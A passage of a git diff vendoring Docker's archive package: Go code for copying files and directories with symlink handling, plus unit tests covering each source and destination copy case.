PreserveTrailingDotOrSeparator(filepath.Clean(srcPath), srcPath) + dstPath = PreserveTrailingDotOrSeparator(filepath.Clean(dstPath), dstPath) + + if srcInfo, err = CopyInfoSourcePath(srcPath, followLink); err != nil { + return err + } + + content, err := TarResource(srcInfo) + if err != nil { + return err + } + defer content.Close() + + return CopyTo(content, srcInfo, dstPath) +} + +// CopyTo handles extracting the given content whose +// entries should be sourced from srcInfo to dstPath. +func CopyTo(content io.Reader, srcInfo CopyInfo, dstPath string) error { + // The destination path need not exist, but CopyInfoDestinationPath will + // ensure that at least the parent directory exists. + dstInfo, err := CopyInfoDestinationPath(normalizePath(dstPath)) + if err != nil { + return err + } + + dstDir, copyArchive, err := PrepareArchiveCopy(content, srcInfo, dstInfo) + if err != nil { + return err + } + defer copyArchive.Close() + + options := &TarOptions{ + NoLchown: true, + NoOverwriteDirNonDir: true, + } + + return Untar(copyArchive, dstDir, options) +} + +// ResolveHostSourcePath decides real path need to be copied with parameters such as +// whether to follow symbol link or not, if followLink is true, resolvedPath will return +// link target of any symbol link file, else it will only resolve symlink of directory +// but return symbol link file itself without resolving. +func ResolveHostSourcePath(path string, followLink bool) (resolvedPath, rebaseName string, err error) { + if followLink { + resolvedPath, err = filepath.EvalSymlinks(path) + if err != nil { + return + } + + resolvedPath, rebaseName = GetRebaseName(path, resolvedPath) + } else { + dirPath, basePath := filepath.Split(path) + + // if not follow symbol link, then resolve symbol link of parent dir + var resolvedDirPath string + resolvedDirPath, err = filepath.EvalSymlinks(dirPath) + if err != nil { + return + } + // resolvedDirPath will have been cleaned (no trailing path separators) so + // we can manually join it with the base path element. + resolvedPath = resolvedDirPath + string(filepath.Separator) + basePath + if hasTrailingPathSeparator(path) && filepath.Base(path) != filepath.Base(resolvedPath) { + rebaseName = filepath.Base(path) + } + } + return resolvedPath, rebaseName, nil +} + +// GetRebaseName normalizes and compares path and resolvedPath, +// return completed resolved path and rebased file name +func GetRebaseName(path, resolvedPath string) (string, string) { + // linkTarget will have been cleaned (no trailing path separators and dot) so + // we can manually join it with them + var rebaseName string + if specifiesCurrentDir(path) && !specifiesCurrentDir(resolvedPath) { + resolvedPath += string(filepath.Separator) + "." + } + + if hasTrailingPathSeparator(path) && !hasTrailingPathSeparator(resolvedPath) { + resolvedPath += string(filepath.Separator) + } + + if filepath.Base(path) != filepath.Base(resolvedPath) { + // In the case where the path had a trailing separator and a symlink + // evaluation has changed the last path component, we will need to + // rebase the name in the archive that is being copied to match the + // originally requested name. + rebaseName = filepath.Base(path) + } + return resolvedPath, rebaseName +} diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go new file mode 100644 index 0000000000..e305b5e4af --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix.go @@ -0,0 +1,11 @@ +// +build !windows + +package archive + +import ( + "path/filepath" +) + +func normalizePath(path string) string { + return filepath.ToSlash(path) +} diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go new file mode 100644 index 0000000000..ecbfc172b0 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/copy_unix_test.go @@ -0,0 +1,978 @@ +// +build !windows + +// TODO Windows: Some of these tests may be salvagable and portable to Windows. + +package archive + +import ( + "bytes" + "crypto/sha256" + "encoding/hex" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + "testing" +) + +func removeAllPaths(paths ...string) { + for _, path := range paths { + os.RemoveAll(path) + } +} + +func getTestTempDirs(t *testing.T) (tmpDirA, tmpDirB string) { + var err error + + if tmpDirA, err = ioutil.TempDir("", "archive-copy-test"); err != nil { + t.Fatal(err) + } + + if tmpDirB, err = ioutil.TempDir("", "archive-copy-test"); err != nil { + t.Fatal(err) + } + + return +} + +func isNotDir(err error) bool { + return strings.Contains(err.Error(), "not a directory") +} + +func joinTrailingSep(pathElements ...string) string { + joined := filepath.Join(pathElements...) + + return fmt.Sprintf("%s%c", joined, filepath.Separator) +} + +func fileContentsEqual(t *testing.T, filenameA, filenameB string) (err error) { + t.Logf("checking for equal file contents: %q and %q\n", filenameA, filenameB) + + fileA, err := os.Open(filenameA) + if err != nil { + return + } + defer fileA.Close() + + fileB, err := os.Open(filenameB) + if err != nil { + return + } + defer fileB.Close() + + hasher := sha256.New() + + if _, err = io.Copy(hasher, fileA); err != nil { + return + } + + hashA := hasher.Sum(nil) + hasher.Reset() + + if _, err = io.Copy(hasher, fileB); err != nil { + return + } + + hashB := hasher.Sum(nil) + + if !bytes.Equal(hashA, hashB) { + err = fmt.Errorf("file content hashes not equal - expected %s, got %s", hex.EncodeToString(hashA), hex.EncodeToString(hashB)) + } + + return +} + +func dirContentsEqual(t *testing.T, newDir, oldDir string) (err error) { + t.Logf("checking for equal directory contents: %q and %q\n", newDir, oldDir) + + var changes []Change + + if changes, err = ChangesDirs(newDir, oldDir); err != nil { + return + } + + if len(changes) != 0 { + err = fmt.Errorf("expected no changes between directories, but got: %v", changes) + } + + return +} + +func logDirContents(t *testing.T, dirPath string) { + logWalkedPaths := filepath.WalkFunc(func(path string, info os.FileInfo, err error) error { + if err != nil { + t.Errorf("stat error for path %q: %s", path, err) + return nil + } + + if info.IsDir() { + path = joinTrailingSep(path) + } + + t.Logf("\t%s", path) + + return nil + }) + + t.Logf("logging directory contents: %q", dirPath) + + if err := filepath.Walk(dirPath, logWalkedPaths); err != nil { + t.Fatal(err) + } +} + +func testCopyHelper(t *testing.T, srcPath, dstPath string) (err error) { + t.Logf("copying from %q to %q (not follow symbol link)", srcPath, dstPath) + + return CopyResource(srcPath, dstPath, false) +} + +func testCopyHelperFSym(t *testing.T, srcPath, dstPath string) (err error) { + t.Logf("copying from %q to %q (follow symbol link)", srcPath, dstPath) + + return CopyResource(srcPath, dstPath, true) +} + +// Basic assumptions about SRC and DST: +// 1. SRC must exist. +// 2. If SRC ends with a trailing separator, it must be a directory. +// 3. DST parent directory must exist. +// 4. If DST exists as a file, it must not end with a trailing separator. + +// First get these easy error cases out of the way. + +// Test for error when SRC does not exist. +func TestCopyErrSrcNotExists(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + if _, err := CopyInfoSourcePath(filepath.Join(tmpDirA, "file1"), false); !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } +} + +// Test for error when SRC ends in a trailing +// path separator but it exists as a file. +func TestCopyErrSrcNotDir(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + if _, err := CopyInfoSourcePath(joinTrailingSep(tmpDirA, "file1"), false); !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } +} + +// Test for error when SRC is a valid file or directory, +// but the DST parent directory does not exist. +func TestCopyErrDstParentNotExists(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false} + + // Try with a file source. + content, err := TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + // Copy to a file whose parent does not exist. + if err = CopyTo(content, srcInfo, filepath.Join(tmpDirB, "fakeParentDir", "file1")); err == nil { + t.Fatal("expected IsNotExist error, but got nil instead") + } + + if !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } + + // Try with a directory source. + srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true} + + content, err = TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + // Copy to a directory whose parent does not exist. + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "fakeParentDir", "fakeDstDir")); err == nil { + t.Fatal("expected IsNotExist error, but got nil instead") + } + + if !os.IsNotExist(err) { + t.Fatalf("expected IsNotExist error, but got %T: %s", err, err) + } +} + +// Test for error when DST ends in a trailing +// path separator but exists as a file. +func TestCopyErrDstNotDir(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + // Try with a file source. + srcInfo := CopyInfo{Path: filepath.Join(tmpDirA, "file1"), Exists: true, IsDir: false} + + content, err := TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil { + t.Fatal("expected IsNotDir error, but got nil instead") + } + + if !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } + + // Try with a directory source. + srcInfo = CopyInfo{Path: filepath.Join(tmpDirA, "dir1"), Exists: true, IsDir: true} + + content, err = TarResource(srcInfo) + if err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + defer content.Close() + + if err = CopyTo(content, srcInfo, joinTrailingSep(tmpDirB, "file1")); err == nil { + t.Fatal("expected IsNotDir error, but got nil instead") + } + + if !isNotDir(err) { + t.Fatalf("expected IsNotDir error, but got %T: %s", err, err) + } +} + +// Possibilities are reduced to the remaining 10 cases: +// +// case | srcIsDir | onlyDirContents | dstExists | dstIsDir | dstTrSep | action +// =================================================================================================== +// A | no | - | no | - | no | create file +// B | no | - | no | - | yes | error +// C | no | - | yes | no | - | overwrite file +// D | no | - | yes | yes | - | create file in dst dir +// E | yes | no | no | - | - | create dir, copy contents +// F | yes | no | yes | no | - | error +// G | yes | no | yes | yes | - | copy dir and contents +// H | yes | yes | no | - | - | create dir, copy contents +// I | yes | yes | yes | no | - | error +// J | yes | yes | yes | yes | - | copy dir contents +// + +// A. SRC specifies a file and DST (no trailing path separator) doesn't +// exist. This should create a file with the name DST and copy the +// contents of the source file into it. +func TestCopyCaseA(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcPath := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "itWorks.txt") + + var err error + + if err = testCopyHelper(t, srcPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } + os.Remove(dstPath) + + symlinkPath := filepath.Join(tmpDirA, "symlink3") + symlinkPath1 := filepath.Join(tmpDirA, "symlink4") + linkTarget := filepath.Join(tmpDirA, "file1") + + if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } + os.Remove(dstPath) + if err = testCopyHelperFSym(t, symlinkPath1, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// B. SRC specifies a file and DST (with trailing path separator) doesn't +// exist. This should cause an error because the copy operation cannot +// create a directory when copying a single file. +func TestCopyCaseB(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcPath := filepath.Join(tmpDirA, "file1") + dstDir := joinTrailingSep(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcPath, dstDir); err == nil { + t.Fatal("expected ErrDirNotExists error, but got nil instead") + } + + if err != ErrDirNotExists { + t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err) + } + + symlinkPath := filepath.Join(tmpDirA, "symlink3") + + if err = testCopyHelperFSym(t, symlinkPath, dstDir); err == nil { + t.Fatal("expected ErrDirNotExists error, but got nil instead") + } + if err != ErrDirNotExists { + t.Fatalf("expected ErrDirNotExists error, but got %T: %s", err, err) + } + +} + +// C. SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func TestCopyCaseC(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "file2") + + var err error + + // Ensure they start out different. + if err = fileContentsEqual(t, srcPath, dstPath); err == nil { + t.Fatal("expected different file contents") + } + + if err = testCopyHelper(t, srcPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } +} + +// C. Symbol link following version: +// SRC specifies a file and DST exists as a file. This should overwrite +// the file at DST with the contents of the source file. +func TestCopyCaseCFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + symlinkPathBad := filepath.Join(tmpDirA, "symlink1") + symlinkPath := filepath.Join(tmpDirA, "symlink3") + linkTarget := filepath.Join(tmpDirA, "file1") + dstPath := filepath.Join(tmpDirB, "file2") + + var err error + + // first to test broken link + if err = testCopyHelperFSym(t, symlinkPathBad, dstPath); err == nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + // test symbol link -> symbol link -> target + // Ensure they start out different. + if err = fileContentsEqual(t, linkTarget, dstPath); err == nil { + t.Fatal("expected different file contents") + } + + if err = testCopyHelperFSym(t, symlinkPath, dstPath); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// D. SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseD(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "file1") + dstDir := filepath.Join(tmpDirB, "dir1") + dstPath := filepath.Join(dstDir, "file1") + + var err error + + // Ensure that dstPath doesn't exist. + if _, err = os.Stat(dstPath); !os.IsNotExist(err) { + t.Fatalf("did not expect dstPath %q to exist", dstPath) + } + + if err = testCopyHelper(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir1") + + if err = testCopyHelper(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, srcPath, dstPath); err != nil { + t.Fatal(err) + } +} + +// D. Symbol link following version: +// SRC specifies a file and DST exists as a directory. This should place +// a copy of the source file inside it using the basename from SRC. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseDFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcPath := filepath.Join(tmpDirA, "symlink4") + linkTarget := filepath.Join(tmpDirA, "file1") + dstDir := filepath.Join(tmpDirB, "dir1") + dstPath := filepath.Join(dstDir, "symlink4") + + var err error + + // Ensure that dstPath doesn't exist. + if _, err = os.Stat(dstPath); !os.IsNotExist(err) { + t.Fatalf("did not expect dstPath %q to exist", dstPath) + } + + if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir1") + + if err = testCopyHelperFSym(t, srcPath, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = fileContentsEqual(t, linkTarget, dstPath); err != nil { + t.Fatal(err) + } +} + +// E. SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. +func TestCopyCaseE(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// E. Symbol link following version: +// SRC specifies a directory and DST does not exist. This should create a +// directory at DST and copy the contents of the SRC directory into the DST +// directory. Ensure this works whether DST has a trailing path separator or +// not. +func TestCopyCaseEFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := filepath.Join(tmpDirA, "dirSymlink") + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } +} + +// F. SRC specifies a directory and DST exists as a file. This should cause an +// error as it is not possible to overwrite a file with a directory. +func TestCopyCaseF(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dir1") + symSrcDir := filepath.Join(tmpDirA, "dirSymlink") + dstFile := filepath.Join(tmpDirB, "file1") + + var err error + + if err = testCopyHelper(t, srcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } + + // now test with symbol link + if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } +} + +// G. SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func TestCopyCaseG(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir2") + resultDir := filepath.Join(dstDir, "dir1") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, srcDir); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir2") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// G. Symbol link version: +// SRC specifies a directory and DST exists as a directory. This should copy +// the SRC directory and all its contents to the DST directory. Ensure this +// works whether DST has a trailing path separator or not. +func TestCopyCaseGFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := filepath.Join(tmpDirA, "dirSymlink") + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir2") + resultDir := filepath.Join(dstDir, "dirSymlink") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir2") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, resultDir, linkTarget); err != nil { + t.Fatal(err) + } +} + +// H. SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseH(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } +} + +// H. Symbol link following version: +// SRC specifies a directory's contents only and DST does not exist. This +// should create a directory at DST and copy the contents of the SRC +// directory (but not the directory itself) into the DST directory. Ensure +// this works whether DST has a trailing path separator or not. +func TestCopyCaseHFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A with some sample files and directories. + createSampleDir(t, tmpDirA) + + srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "." + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "testDir") + + var err error + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "testDir") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Log("dir contents not equal") + logDirContents(t, tmpDirA) + logDirContents(t, tmpDirB) + t.Fatal(err) + } +} + +// I. SRC specifies a directory's contents only and DST exists as a file. This +// should cause an error as it is not possible to overwrite a file with a +// directory. +func TestCopyCaseI(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." + symSrcDir := filepath.Join(tmpDirB, "dirSymlink") + dstFile := filepath.Join(tmpDirB, "file1") + + var err error + + if err = testCopyHelper(t, srcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } + + // now try with symbol link of dir + if err = testCopyHelperFSym(t, symSrcDir, dstFile); err == nil { + t.Fatal("expected ErrCannotCopyDir error, but got nil instead") + } + + if err != ErrCannotCopyDir { + t.Fatalf("expected ErrCannotCopyDir error, but got %T: %s", err, err) + } +} + +// J. SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func TestCopyCaseJ(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dir1") + "." + dstDir := filepath.Join(tmpDirB, "dir5") + + var err error + + // first to create an empty dir + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir5") + + if err = testCopyHelper(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, srcDir); err != nil { + t.Fatal(err) + } +} + +// J. Symbol link following version: +// SRC specifies a directory's contents only and DST exists as a directory. +// This should copy the contents of the SRC directory (but not the directory +// itself) into the DST directory. Ensure this works whether DST has a +// trailing path separator or not. +func TestCopyCaseJFSym(t *testing.T) { + tmpDirA, tmpDirB := getTestTempDirs(t) + defer removeAllPaths(tmpDirA, tmpDirB) + + // Load A and B with some sample files and directories. + createSampleDir(t, tmpDirA) + createSampleDir(t, tmpDirB) + + srcDir := joinTrailingSep(tmpDirA, "dirSymlink") + "." + linkTarget := filepath.Join(tmpDirA, "dir1") + dstDir := filepath.Join(tmpDirB, "dir5") + + var err error + + // first to create an empty dir + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } + + // Now try again but using a trailing path separator for dstDir. + + if err = os.RemoveAll(dstDir); err != nil { + t.Fatalf("unable to remove dstDir: %s", err) + } + + if err = os.MkdirAll(dstDir, os.FileMode(0755)); err != nil { + t.Fatalf("unable to make dstDir: %s", err) + } + + dstDir = joinTrailingSep(tmpDirB, "dir5") + + if err = testCopyHelperFSym(t, srcDir, dstDir); err != nil { + t.Fatalf("unexpected error %T: %s", err, err) + } + + if err = dirContentsEqual(t, dstDir, linkTarget); err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/copy_windows.go 